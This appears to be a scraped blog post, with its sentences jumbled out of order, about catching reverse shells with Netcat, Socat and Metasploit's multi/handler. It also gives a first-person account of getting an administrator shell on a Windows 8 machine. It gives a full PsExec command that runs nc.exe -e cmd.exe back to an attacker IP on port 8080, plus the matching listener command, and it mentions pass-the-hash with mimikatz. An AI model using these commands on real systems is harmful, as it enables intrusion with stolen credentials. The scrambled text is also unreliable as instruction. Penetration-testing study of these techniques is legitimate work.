It is also the ONLY way to interact with a meterpreter shell and is the easiest way to handle " staged" payloads. Due to being part of Metasploit, the multi/handler provides a fully-fledged way to obtain stable shells with a wide variety of further options to improve the caught shell. The " auxiliary/multi/handler" module of the Metasploit framework is used to receive reverse shells. exe" versions specifically for use on Windows. There are workarounds to the problems however.īoth Socat and Netcat also have ". Netcat is installed on virtually every Linux distro by default but Socat is rarely installed In this sense, it is vastly superior however, there are two catches:
Socat shells are usually more stable than netcat shells out of the box. It can do all the same things and much more. Netcat shells are generally very unstable by default but can be improved by certain techniques. It is used to manually perform all kinds of network interactions, including things like banner grabbing during enumeration or can be used to receive reverse shells and connect to remote ports attached to bind shells. In general terms, we need malicious shell code, as well as a way of interfacing with the resulting shell. This then spawned a reverse TCP shell using netcat that connected back to my attacking machine on port 8080 with a pretty cmd prompt as tom! Hopefully you thought this was interesting! I have seen a lot of frustration around this situation where one has credentials but can't seem to escalate with just a layer 4 shell.There are a variety of tools that we use to receive reverse shells and to send bind shells. My command looked like this PsExec -u tom -p iamtom \\TOMSCOMP C:\path\to\nc.exe IP_OF_ATTACKING_SYSTEM 8080 -e C:\windows\system32\cmd.exe Next you need to execute nc.exe with PsExec.exe using the credentials of the user you want to intrude. You will need to start a listener on your attacking machine like so: nc -lvp 8080 Second you need PsExec.exe and nc.exe on the system.
Netcat windows spawn command password#
Here is what I did.įirst obviously you need the credentials of the user, we will say the username is "tom", the password is "iamtom" and we have a hostname of "TOMSCOMP". So I uploaded Netcat and began to mess around with it but couldn't get it to work, again because of lack of Windows knowledge.
Then I thought maybe it was spawning a GUI cmd.exe. I finally got PsExec to hang instead of an error about PsExecSvc access denied. I tried PsExec locally, fiddled around with it a bit (being frustrated because of my little Windows experience). This way I could put a password in the command line arguments and execute a command with the privileges of that user.
At this point I was getting frustrated because I am so close to having administrator privileges but so far! I was talking to a friend who told me about running PsExec locally. Including some powershell tricks which did not work due to WinRM being disabled. I had tried PTH (Pass The Hash) with mimikatz and some other things as well, like a lot of ways to try and get runas to read my input.
Netcat windows spawn command windows 8#
I was playing around inside of a Windows 8 enterprise system, I had credentials of the admin user. For this post I am going to talk about something I messed around with for a while.
0 kommentar(er)
